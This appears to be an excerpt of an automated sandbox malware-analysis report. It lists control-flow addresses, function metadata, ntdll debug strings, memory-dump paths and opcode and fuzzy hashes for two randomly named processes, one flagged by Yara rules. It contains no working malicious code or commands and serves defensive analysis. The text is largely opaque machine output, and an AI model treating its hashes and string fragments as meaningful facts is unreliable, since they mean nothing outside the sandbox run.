                                                control_flow_graph 469 142d770-142d7ab 470 142d7b1-142d7bb 469->470 471 142d9e7-142d9ee 469->471 473 1479357 470->473 474 142d7c1-142d7ca 470->474 471->470 472 142d9f4-147932c 471->472 472->470 479 1479332-1479337 472->479 480 1479361-1479370 473->480 474->473 475 142d7d0-142d7d3 474->475 477 142d9da-142d9dc 475->477 478 142d7d9-142d7db 475->478 481 142d7e1-142d7e4 477->481 483 142d9e2 477->483 478->473 478->481 482 142d927-142d938 call 1454c30 479->482 484 147934b-1479354 call 149f290 480->484 481->473 485 142d7ea-142d7ed 481->485 483->485 484->473 488 142d7f3-142d7f6 485->488 489 142d9f9-142da02 485->489 492 142d7fc-142d848 call 142d660 488->492 493 142da0d-142da16 488->493 489->488 494 142da08-1479346 489->494 492->482 499 142d84e-142d852 492->499 493->492 497 142da1c 493->497 494->484 497->480 499->482 500 142d858-142d85f 499->500 501 142d9d1-142d9d5 500->501 502 142d865-142d869 500->502 503 1479563-147957b call 149f290 501->503 504 142d870-142d87a 502->504 503->482 504->503 505 142d880-142d887 504->505 508 142d889-142d88d 505->508 509 142d8ed-142d90d 505->509 511 142d893-142d898 508->511 512 1479372 508->512 510 142d910-142d913 509->510 513 142d915-142d918 510->513 514 142d93b-142d940 510->514 515 142d89e-142d8a5 511->515 516 1479379-147937b 511->516 512->516 519 142d91e-142d920 513->519 520 1479559-147955e 513->520 521 14794d3-14794db 514->521 522 142d946-142d949 514->522 517 142d8ab-142d8e3 call 1458250 515->517 518 14793ea-14793ed 515->518 516->515 523 1479381-14793aa 516->523 543 142d8e5-142d8e7 517->543 525 14793f1-1479400 call 14682c0 518->525 526 142d922 519->526 527 142d971-142d98c call 142a6e0 519->527 520->482 528 142da21-142da2f 521->528 529 14794e1-14794e5 521->529 522->528 530 142d94f-142d952 522->530 523->509 531 14793b0-14793ca call 14682c0 523->531 553 1479417 525->553 554 1479402-1479410 525->554 526->482 550 142d992-142d9ba 527->550 551 1479528-147952d 527->551 533 142d954-142d964 528->533 534 142da35-142da3e 528->534 529->528 538 14794eb-14794f4 529->538 530->513 530->533 531->543 548 14793d0-14793e3 531->548 533->513 539 142d966-142d96f 533->539 534->519 540 14794f6-14794f9 538->540 541 1479512-1479514 538->541 539->519 546 1479503-1479506 540->546 547 14794fb-1479501 540->547 541->528 552 147951a-1479523 541->552 543->509 549 1479420-1479424 543->549 555 147950f 546->555 556 1479508-147950d 546->556 547->541 548->531 557 14793e5 548->557 549->509 561 147942a-1479430 549->561 558 142d9bc-142d9be 550->558 551->558 559 1479533-1479536 551->559 552->519 553->549 554->525 560 1479412 554->560 555->541 556->552 557->509 562 142d9c4-142d9cb 558->562 563 1479549-147954e 558->563 559->558 564 147953c-1479544 559->564 560->509 565 1479457-1479460 561->565 566 1479432-147944f 561->566 562->501 562->504 563->482 569 1479554 563->569 564->510 567 14794a7-14794a9 565->567 568 1479462-1479467 565->568 566->565 570 1479451-1479454 566->570 572 14794cc-14794ce 567->572 573 14794ab-14794c6 call 1414508 567->573 568->567 571 1479469-147946d 568->571 569->520 570->565 574 1479475-14794a1 RtlDebugPrintTimes 571->574 575 147946f-1479473 571->575 572->482 573->482 573->572 574->567 579 14794a3 574->579 575->567 575->574 579->567
                                                APIs
                                                Strings
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01479346
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 01479341, 01479366
                                                • GsHd, xrefs: 0142D874
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0147936B
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                • API String ID: 3446177414-576511823
                                                • Opcode ID: 92b0ed8e75cbcddee59aea27c8e349b50819c2ef5e32e62683a9c9776a96f27e
                                                • Instruction ID: 1b5e0afb3988791dc66a702e89fe2ce77439296cf68d0549edd27e3f601cbd40
                                                • Opcode Fuzzy Hash: 92b0ed8e75cbcddee59aea27c8e349b50819c2ef5e32e62683a9c9776a96f27e
                                                • Instruction Fuzzy Hash: 67E1C270A043128FDB20CF68C480B6BBBE5BF88318F44492EF9958B3A1D771D985CB42
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                • Instruction ID: 0154d6d731da617b66861c25cc1a1dde4d17027a2e4274b541c017ad54fef975
                                                • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                • Instruction Fuzzy Hash: 89819F70E052499EEF658E6CC8917BEBBA3EF45320F18415BDC65A73A3C7349841CB61
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$@
                                                • API String ID: 3446177414-1194432280
                                                • Opcode ID: 17921a362cd97078ec7942507823fe6be9de77c435b9c4f18faebc40fc68bbe3
                                                • Instruction ID: 72f38f03babd7d9b18a4eef076dbee068e144a983328d5f1fee1d66296062006
                                                • Opcode Fuzzy Hash: 17921a362cd97078ec7942507823fe6be9de77c435b9c4f18faebc40fc68bbe3
                                                • Instruction Fuzzy Hash: 96812871D002699BDB35CF54CC44BEABBB8AB18754F0441EBEA19B7290D7709E85CFA0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: 0IFw$0IFw$0IFw$X
                                                • API String ID: 3446177414-2496372868
                                                • Opcode ID: 434e090765ccd528b1c8ca796ff7cbb0968df46f560dec7e426273162e27add5
                                                • Instruction ID: c2262ad5459920fef75e76f4fc4a78f8c78ed6bfaaa23c18bcdaec2450f4256a
                                                • Opcode Fuzzy Hash: 434e090765ccd528b1c8ca796ff7cbb0968df46f560dec7e426273162e27add5
                                                • Instruction Fuzzy Hash: 64318131D0024AEBCFA2CF99D844B8E3BB1AB88754F05401EFD185E267E3709A94DF45
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                • API String ID: 3446177414-56086060
                                                • Opcode ID: 374de5c1234b7452078a7764ae7023118de817c3c83f9b9104ff4397f919bb5b
                                                • Instruction ID: 98c1f518bdb6e1b02373fd9538fd86b435bdac9ef7ccfbe1750dfb8b5527dff1
                                                • Opcode Fuzzy Hash: 374de5c1234b7452078a7764ae7023118de817c3c83f9b9104ff4397f919bb5b
                                                • Instruction Fuzzy Hash: DE414631A00341DFD726DF69C488BAAB7E4EF98724F10816FD925877B1C774A889C791
                                                APIs
                                                Strings
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01494888
                                                • LdrpCheckRedirection, xrefs: 0149488F
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01494899
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 3446177414-3154609507
                                                • Opcode ID: 31681c29dba6e719f53d88794904afe1b301150bed6e244b0bf70c4aab931c65
                                                • Instruction ID: 3562fa43e5c10fa2f46c860e1ce2258ddb1e03c97fff85faeba872017115716f
                                                • Opcode Fuzzy Hash: 31681c29dba6e719f53d88794904afe1b301150bed6e244b0bf70c4aab931c65
                                                • Instruction Fuzzy Hash: 7B41D036A142558FCF22CE59DA40A2B7FE4AF49A54B0A059FED589B371E330D802CB81
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                • API String ID: 3446177414-3526935505
                                                • Opcode ID: 2ae8a10650f038d54584245d4400ad6d113691180d666454ec5a5eeefeb42dcd
                                                • Instruction ID: 4a90030243176ba3fb0682bb76c07e89670cd5d53b6e585882234ba8704c7db1
                                                • Opcode Fuzzy Hash: 2ae8a10650f038d54584245d4400ad6d113691180d666454ec5a5eeefeb42dcd
                                                • Instruction Fuzzy Hash: 7F314134654780DFD727DB69C809BA6BBE4EB15A14F04405BE8228B7B2C7B8A889C751
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $
                                                • API String ID: 3446177414-3993045852
                                                • Opcode ID: bb636b953a854be14ca4bdeb289e7d928a96c6f12d3878d5f56849af655802ad
                                                • Instruction ID: de157ce275203c97c452a88a92dd060961a2d844deb0cc8d234c3d397cb801da
                                                • Opcode Fuzzy Hash: bb636b953a854be14ca4bdeb289e7d928a96c6f12d3878d5f56849af655802ad
                                                • Instruction Fuzzy Hash: FA11A132E00218EBCF16AF94E84869D7B71FF44324F10811AF82A6B2E4CB715E04DF41
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a54584dd0b5048a3b80708b2631775508711f8ab6d31f4e497dd89094f112d8
                                                • Instruction ID: 5ebc2c6382e92d01502d2d283fc76fb161755f1595f7809bc7b2300ef93e3829
                                                • Opcode Fuzzy Hash: 5a54584dd0b5048a3b80708b2631775508711f8ab6d31f4e497dd89094f112d8
                                                • Instruction Fuzzy Hash: FBE1FE70D00608DFDF26CFA9D980AAEBBF1BF88314F24452AE556A7361D771A849CF11
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: ee1854b7138ced829ad912661f2099b8ed54f7e63ad48d42baa6fe110a25d4bf
                                                • Instruction ID: fe0c816bdd3d2789fafd651aa8d4ee7d94d89b76b4644c968d7fdb35059a1c29
                                                • Opcode Fuzzy Hash: ee1854b7138ced829ad912661f2099b8ed54f7e63ad48d42baa6fe110a25d4bf
                                                • Instruction Fuzzy Hash: C7711571E00219AFDF05EFA8C984ADDBBF5BF49314F14402AEA05FB264D734A909CB64
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: a6a2b8e7b3b4fd2d075d57f7e0b1ef596639e1a2ad90531da65f3f975dc2d555
                                                • Instruction ID: 85ac007fbd38301391d5718aa8d617e78ac39860cb8367ef2ab21a1f17bb4e4f
                                                • Opcode Fuzzy Hash: a6a2b8e7b3b4fd2d075d57f7e0b1ef596639e1a2ad90531da65f3f975dc2d555
                                                • Instruction Fuzzy Hash: B9513176E002199FDF09DF98D844ADDBBF1BF48314F18812AE915AB2A0D734A909CF54
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                • String ID:
                                                • API String ID: 4281723722-0
                                                • Opcode ID: fca0dc33ffa29db55cceaa45c56eacf8ea1c348020ef79feae4b738b2cde135a
                                                • Instruction ID: 4a5bfaf3e2fdf61eda4f0db374b67e74f103e54606dce07bbc496bb01e611cd2
                                                • Opcode Fuzzy Hash: fca0dc33ffa29db55cceaa45c56eacf8ea1c348020ef79feae4b738b2cde135a
                                                • Instruction Fuzzy Hash: 6B314475E0021A9FCF22EFA8D885A9EBBF0BB58720F14412AE521BB3A4D7315D01DF54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Bl$l
                                                • API String ID: 3446177414-208461968
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 01455E34
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__start
                                                • String ID: pow
                                                • API String ID: 3213639722-2276729525
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0$Flst
                                                • API String ID: 0-758220159
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 0143D959
                                                  • Part of subcall function 01414859: RtlDebugPrintTimes.NTDLL ref: 014148F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$
                                                • API String ID: 3446177414-233714265
                                                APIs
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0149CFBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: CallFilterFunc@8
                                                • String ID: @$@4Qw@4Qw
                                                • API String ID: 4062629308-2383119779
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $
                                                • API String ID: 3446177414-3993045852
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: 0$0
                                                • API String ID: 3446177414-203156872
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$%A$.$.^$/$5?$6$$7$;$@$A*$F$G$H:$I$K$Q$T9$U$VW$_;$e$g$lP$v$w$x$z${V$&$O$e
                                                • API String ID: 0-2514921418
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 6$O$S$\$s
                                                • API String ID: 0-3854637164
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: At
                                                • API String ID: 0-4292073886
                                                • Opcode Fuzzy Hash: e0752696f63cd8cf661718b33764bfd2a92305c542ef21ad9ebd3420ec2ac457
                                                • Instruction Fuzzy Hash: 29118EB59047187FD710DB94CC45FAFBBACEF89700F008549F9186B280E7B069118BA1
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 500380608c6c29eed148fd125e89144604597ed180db69136bbe74afd495da6e
                                                • Instruction ID: 0b58bc01cac7692b9802bc761a7e2f2a2136384c5006e1362406ebe70f7dafd3
                                                • Opcode Fuzzy Hash: 500380608c6c29eed148fd125e89144604597ed180db69136bbe74afd495da6e
                                                • Instruction Fuzzy Hash: DD118E75A00758BFD710DB98CC45FAFB7ACEF85700F008549F9185B240E7B06911CBA1
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4cd4280d41d9b0ffbbefb1fd3d98d1d2ca84c7f99bb972688164bbfd40e7bfce
                                                • Instruction ID: 4732c24214cc106262a7514ac77138906bf6cd317cb095bece3ba4300596f505
                                                • Opcode Fuzzy Hash: 4cd4280d41d9b0ffbbefb1fd3d98d1d2ca84c7f99bb972688164bbfd40e7bfce
                                                • Instruction Fuzzy Hash: 3601C0B2201208BFDB44DE99DC90EEB77ADEF8C714F108208FA09A7240D630E8518BA4
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15eed0700824272cbed1b1ee8f01b86248a1654018556e985f17cbedec426a76
                                                • Instruction ID: 513e87f01d1e6a0daa1d12deb0d0875ff3a8ccb00ecd81e40e597f98011787fd
                                                • Opcode Fuzzy Hash: 15eed0700824272cbed1b1ee8f01b86248a1654018556e985f17cbedec426a76
                                                • Instruction Fuzzy Hash: C601EDB6C11219AFCB44DFE9D9809EEFBF9AB08200F14466EE915F7200F7705A048FA1
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b44610ca1478e1b6d745acd21700ce6e4c4dd39e1c9f0f1095c6d61ab23b8a00
                                                • Instruction ID: 8229bdbbf764c42c9b101debb0fa21b93e5e47247dedd155bbc19279875d051b
                                                • Opcode Fuzzy Hash: b44610ca1478e1b6d745acd21700ce6e4c4dd39e1c9f0f1095c6d61ab23b8a00
                                                • Instruction Fuzzy Hash: 47F04073A142131BE7248A2DAC88B8BFBDCEB84234F280722FC58DA181D37194518790
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 32c5c2cf4d87909e97c69abf1ade004c13c237691f2f7817a1ff01f0728da7e7
                                                • Instruction ID: d472380ec097c369d1b6c0485926e58667d3c0131388833bd09d74f4aca5a051
                                                • Opcode Fuzzy Hash: 32c5c2cf4d87909e97c69abf1ade004c13c237691f2f7817a1ff01f0728da7e7
                                                • Instruction Fuzzy Hash: E0F012B5210615BFCB10DF99DC91EEB77ADEF88710F004519F91897241D670B9518BF0
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 061bf1b2222f06f666ad7ef0efabbb06efe809c570bb92f9aad6666bc0850f42
                                                • Instruction ID: 1346a84b41a7fac94a57797c33dc48ce06b46a60db26aa9557380f3f79539a94
                                                • Opcode Fuzzy Hash: 061bf1b2222f06f666ad7ef0efabbb06efe809c570bb92f9aad6666bc0850f42
                                                • Instruction Fuzzy Hash: 6FF08271C15209EBDB14CFA4D882BDDBBB8EB44324F1083AEE8299B2C0D63497618781
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                • Instruction ID: b75ed368a3e60d345ab5944b4b541216bdad7b2c67c47906c944637f26158a69
                                                • Opcode Fuzzy Hash: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                • Instruction Fuzzy Hash: 76E06DB52003187BD610EF58DC45EEB77ADEFC9710F404519F908AB241DA70B8518BB5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e6337151cd32d136859f64801a72e05f170ad640368003db070b3d6c8777738
                                                • Instruction ID: 444e3bb92c972bfec17e2253c06cf92846908194d03d942c2121fc9c7c6691d0
                                                • Opcode Fuzzy Hash: 3e6337151cd32d136859f64801a72e05f170ad640368003db070b3d6c8777738
                                                • Instruction Fuzzy Hash: EBE08636A0033437C224A5899C45F57BB9CCFC3E60F090124FE08AB340E660E91142E5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                • Instruction ID: cd90b82449a44396f7e287c24791d970e1ec49e52b04c6bf3b1265fb614c1d41
                                                • Opcode Fuzzy Hash: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                • Instruction Fuzzy Hash: AAE04F756402147BD520EB59DC41FABB79CEBC5B10F008515FA09AB240CAB1B9118BA0
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e96378fa17382bedff40c33f1e0709699db874266609bc1f1b938e2e6b777b70
                                                • Instruction ID: d4a2f8b1e56aaaaf9d89b21c14db53133cb0014f2580d56b50990f423e7bbed4
